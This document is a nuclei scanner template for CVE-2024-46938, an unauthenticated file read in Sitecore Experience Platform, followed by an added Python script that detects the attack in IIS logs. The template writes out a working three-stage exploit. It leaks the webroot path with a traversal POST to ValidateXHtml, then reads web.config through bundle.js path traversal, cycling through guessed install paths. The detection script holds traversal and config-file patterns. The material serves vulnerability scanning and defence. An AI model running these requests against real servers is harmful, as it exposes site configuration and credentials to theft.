id: CVE-2024-46938

info:
  name: Sitecore Experience Platform <= 10.4 - Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    An issue was discovered in Sitecore Experience Platform (XP), Experience Manager (XM), and Experience Commerce (XC) 8.0 Initial Release through 10.4 Initial Release. An unauthenticated attacker can read arbitrary files.
  impact: |
    Unauthenticated attackers can read arbitrary files from the Sitecore server, potentially exposing sensitive configuration and credentials.
  remediation: |
    Update Sitecore Experience Platform to a version that patches CVE-2024-46938.
  reference:
    - https://www.assetnote.io/resources/research/leveraging-an-order-of-operations-bug-to-achieve-rce-in-sitecore-8-x---10-x
    - https://nvd.nist.gov/vuln/detail/CVE-2024-46938
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-46938
    epss-score: 0.93431
    epss-percentile: 0.99828
    cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 45
    vendor: sitecore
    product: experience_commerce
    shodan-query: http.title:"sitecore"
    fofa-query: title="sitecore"
    google-query: intitle:"sitecore"
  tags: cve,cve2024,sitecore,lfi,rce,vkev,vuln

# Three-stage flow: fingerprint a Sitecore instance, leak the webroot path from an
# error message, then read web.config through the bundle handler's path traversal.
flow: http(1) && http(2) && http(3)

http:
  # Stage 1: a non-existent media item redirects to Sitecore's notfound page.
  - method: GET
    path:
      - "{{BaseURL}}/-/media/doo-doo.ashx"

    host-redirects: true
    matchers:
      - type: word
        part: location
        words:
          - "/sitecore/service/notfound.aspx"
        internal: true

  # Stage 2: the ValidateXHtml handler echoes the resolved on-disk path in its error,
  # which discloses the site's physical root for use in stage 3.
  - raw:
      - |
        POST /-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.ValidateXHtml?hdl=a HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        __PAGESTATE=/../../x/x

    matchers:
      - type: word
        part: body
        words:
          - "Could not find a part of the path"
        internal: true

    extractors:
      - type: regex
        name: file_path
        group: 1
        regex:
          - Could not find a part of the path '([^']+)\\x\\x\.txt
        internal: true

  # Stage 3: traverse from the bundle handler to web.config, trying the leaked
  # path first and common Sitecore install locations as fallbacks.
  - raw:
      - |
        GET /-/speak/v1/bundles/bundle.js?f={{paths}}sitecore\shell\client\..\..\..\web.config%23.js HTTP/1.1
        Host: {{Hostname}}

    payloads:
      paths:
        - '{{file_path}}\'
        - 'C:\inetpub\wwwroot\sitecore\'
        - 'C:\inetpub\wwwroot\sitecore1\'
        - 'C:\inetpub\wwwroot\sxa\'
        - 'C:\inetpub\wwwroot\XP0.sc\'
        - 'C:\inetpub\wwwroot\Sitecore82\'
        - 'C:\inetpub\wwwroot\Sitecore81\'
        - 'C:\inetpub\wwwroot\Sitecore81u2\'
        - 'C:\inetpub\wwwroot\Sitecore7\'
        - 'C:\inetpub\wwwroot\Sitecore8\'
        - 'C:\inetpub\wwwroot\Sitecore70\'
        - 'C:\inetpub\wwwroot\Sitecore71\'
        - 'C:\inetpub\wwwroot\Sitecore72\'
        - 'C:\inetpub\wwwroot\Sitecore75\'
        - 'C:\Websites\spe.dev.local\'
        - 'C:\inetpub\wwwroot\SitecoreInstance\'
        - 'C:\inetpub\wwwroot\SitecoreSPE_8\'
        - 'C:\inetpub\wwwroot\SitecoreSPE_91\'
        - 'C:\inetpub\wwwroot\Sitecore9\'
        - 'C:\inetpub\wwwroot\sitecore93sc.dev.local\'
        - 'C:\inetpub\wwwroot\Sitecore81u3\'
        - 'C:\inetpub\wwwroot\sitecore9.sc\'
        - 'C:\inetpub\wwwroot\sitecore901xp0.sc\'
        - 'C:\inetpub\wwwroot\sitecore9-website\'
        - 'C:\inetpub\wwwroot\sitecore93.sc\'
        - 'C:\inetpub\wwwroot\'
        - 'C:\inetpub\{{Hostname}}.sc\'
        - 'C:\inetpub\{{FQDN}}.sc\'
        - 'C:\inetpub\{{RDN}}.sc\'
        - 'C:\inetpub\{{FQDN}}\'
        - 'C:\inetpub\{{RDN}}\'
        - 'C:\inetpub\{{Hostname}}\'
        - 'C:\inetpub\{{Hostname}}.sitecore\'
        - 'C:\inetpub\{{FQDN}}.sitecore\'
        - 'C:\inetpub\{{RDN}}.sitecore\'
        - 'C:\inetpub\{{Hostname}}.website\'
        - 'C:\inetpub\{{FQDN}}.website\'
        - 'C:\inetpub\{{RDN}}.website\'
        - 'C:\inetpub\{{Hostname}}.dev.local\'
        - 'C:\inetpub\{{FQDN}}.dev.local\'
        - 'C:\inetpub\{{RDN}}.dev.local\'
        - 'C:\inetpub\{{Hostname}}sc.dev.local\'
        - 'C:\inetpub\{{FQDN}}sc.dev.local\'
        - 'C:\inetpub\{{RDN}}sc.dev.local\'

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          # Assumed marker: the root element of web.config. The original string was
          # stripped with the page's HTML, and an empty string would match any body.
          - 'contains(body, "<configuration>")'
          - 'contains(content_type, "text/javascript")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100cdb8c71bd7925cf611a740aa2e46b679d80ec3b61d813a25e02e23874bc2789d022100c0accf41d323d8a7aad2defd6f98f2c38ef16c2d3e54a76564240a07d6214552:922c64590222798bb761d5b6d8e72950
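The template's stages 2 and 3 each leave a distinctive entry in the web server's access log, which is what a defender can alert on. The following is an added example, not part of the nuclei template and not Sitecore or ProjectDiscovery code: it parses IIS W3C-format log lines (assuming the field names declared in the log's own `#Fields:` directive) and flags the ValidateXHtml POST and any `bundle.js` request whose decoded `f` parameter contains parent-directory traversal, an absolute Windows path, or a sensitive config file name. The sample log is constructed; the request paths and the `web.config%23.js` payload shape are taken from the template above.

```python
import re
from urllib.parse import parse_qs, unquote

# Request paths from the template above, compared case-insensitively because
# IIS and ASP.NET resolve URL paths without regard to case.
VALIDATE_XHTML_STEM = (
    "/-/xaml/sitecore.shell.applications.contenteditor.dialogs.edithtml.validatexhtml"
)
BUNDLE_JS_STEM = "/-/speak/v1/bundles/bundle.js"

# Indicators in the decoded "f" parameter: "..\" or "../" traversal, a drive-letter
# path, or a UNC path. Legitimate bundle requests use site-relative paths.
TRAVERSAL_RE = re.compile(r"\.\.[\\/]|^[A-Za-z]:[\\/]|^[\\/]{2}")
SENSITIVE_FILE_RE = re.compile(r"web\.config|connectionstrings\.config", re.IGNORECASE)

# Constructed sample log: one exploitation sequence from 203.0.113.7 and
# ordinary traffic from 198.51.100.9 that must not be flagged.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-09-10 12:00:01 10.0.0.5 GET /-/media/doo-doo.ashx - 443 - 203.0.113.7 curl/8.4 302
2024-09-10 12:00:02 10.0.0.5 POST /-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.ValidateXHtml hdl=a 443 - 203.0.113.7 curl/8.4 500
2024-09-10 12:00:03 10.0.0.5 GET /-/speak/v1/bundles/bundle.js f=C:\inetpub\wwwroot\sitecore\shell\client\..\..\..\web.config%23.js 443 - 203.0.113.7 curl/8.4 200
2024-09-10 12:00:04 10.0.0.5 GET /-/speak/v1/bundles/bundle.js f=/sitecore/shell/client/Speak/Assets/lib/core/deps/require.js 443 - 198.51.100.9 Mozilla/5.0 200
2024-09-10 12:00:05 10.0.0.5 GET /sitecore/login - 443 - 198.51.100.9 Mozilla/5.0 200
"""


def parse_w3c_log(text):
    """Yield one dict per request line, keyed by the names in the most recent
    '#Fields:' directive; other '#' lines are directives and are skipped."""
    fields = None
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError(f"line {lineno}: request line before any #Fields: directive")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed line: skip rather than mis-assign columns
        record = dict(zip(fields, values))
        record["_line"] = lineno
        yield record


def decode_f_param(query):
    """Return the decoded 'f' parameter or None. parse_qs decodes once; the extra
    unquote also catches double-encoded payloads such as %252e%252e."""
    if query in ("", "-"):
        return None
    values = parse_qs(query, keep_blank_values=True).get("f")
    return unquote(values[0]) if values else None


def scan_iis_log(text):
    """Return findings for the two loggable exploitation stages of CVE-2024-46938:
    the ValidateXHtml POST (path disclosure) and the bundle.js traversal (file read)."""
    findings = []
    for rec in parse_w3c_log(text):
        stem = rec.get("cs-uri-stem", "").lower()
        method = rec.get("cs-method", "").upper()
        base = {"line": rec["_line"], "client": rec.get("c-ip", "-"),
                "status": rec.get("sc-status", "-")}
        if method == "POST" and stem == VALIDATE_XHTML_STEM:
            # The traversal is in the POST body (__PAGESTATE), which IIS does not
            # log, so this is medium confidence; anonymous callers (cs-username "-")
            # of a Content Editor handler are the ones worth triaging.
            findings.append({**base, "stage": "path-disclosure", "confidence": "medium",
                             "detail": "POST to ValidateXHtml, cs-username=" + rec.get("cs-username", "-")})
        elif stem == BUNDLE_JS_STEM:
            f = decode_f_param(rec.get("cs-uri-query", "-"))
            if f and (TRAVERSAL_RE.search(f) or SENSITIVE_FILE_RE.search(f)):
                findings.append({**base, "stage": "file-read", "confidence": "high",
                                 "detail": "bundle.js f=" + f})
    return findings


def stages_by_client(findings):
    """Group stages by client IP; a client showing both stages has run the full
    chain that the template automates, and a 200 on the file-read stage means
    the matcher condition in the template would have fired."""
    out = {}
    for f in findings:
        out.setdefault(f["client"], set()).add(f["stage"])
    return out


if __name__ == "__main__":
    hits = scan_iis_log(SAMPLE_LOG)
    for h in hits:
        print(f"line {h['line']} {h['client']} {h['stage']} ({h['confidence']}, "
              f"status {h['status']}): {h['detail']}")
    print(stages_by_client(hits))
```

Stage 1 of the template (a `/-/media/*.ashx` request answered with a redirect to `notfound.aspx`) is a fingerprint that ordinary broken links also produce, so it is deliberately not an indicator here; it is only useful as context once a client has tripped one of the two logged stages. Fields beyond the ones the sample declares (for example `cs(Referer)` or `time-taken`) are handled by the same `#Fields:` parsing.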